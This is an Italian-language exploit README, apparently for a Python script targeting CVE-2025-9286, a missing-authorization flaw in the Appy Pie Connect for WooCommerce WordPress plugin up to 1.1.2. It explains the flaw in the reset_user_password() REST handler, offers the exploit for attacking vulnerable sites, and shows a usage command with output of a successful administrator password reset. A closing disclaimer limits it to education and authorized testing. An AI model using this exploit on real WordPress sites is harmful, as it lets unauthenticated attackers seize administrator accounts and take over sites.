
Appy Pie Connect for WooCommerce <= 1.1.2 - Mancanza di autorizzazione per l'escalation di privilegi non autenticata
Appy Pie Connect for WooCommerce <= 1.1.2 - Autorizzazione mancante che consente l'Escalation dei privilegi non autenticata
Il plugin Appy Pie Connect for WooCommerce per WordPress è vulnerabile all'Escalation dei privilegi a causa della mancata autorizzazione all'interno del gestore REST reset_user_password() in tutte le versioni fino alla 1.1.2 inclusa.
Ciò consente a utenti non autenticati di reimpostare la password di utenti arbitrari, inclusi gli amministratori, ottenendo così accesso amministrativo.
Il seguente exploit può essere utilizzato per sfruttare CVE-2025-9286 contro siti WordPress che eseguono la versione vulnerabile del plugin.
Nome dello script: CVE-2025-9286.py
python CVE-2025-9286.py -u http://nxploit.ddev.site/ -id 1
[+] Checking plugin version: http://nxploit.ddev.site/wp-content/plugins/appy-pie-connect-for-woocommerce/readme.txt
[!] Vulnerable plugin detected (1.1.2). Attempting exploitation...
[*] Please wait, attempting to change password...
[+] Exploit successful! Password has been reset.
[*] New password: Nxploited
[+] Vulnerability exploited and password changed successfully.
Questo exploit è destinato esclusivamente a scopi educativi e di test di penetrazione autorizzati.
L'uso non autorizzato contro sistemi senza un permesso esplicito è illegale.
L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento.
Di: Khaled Alenazi (Nxploited)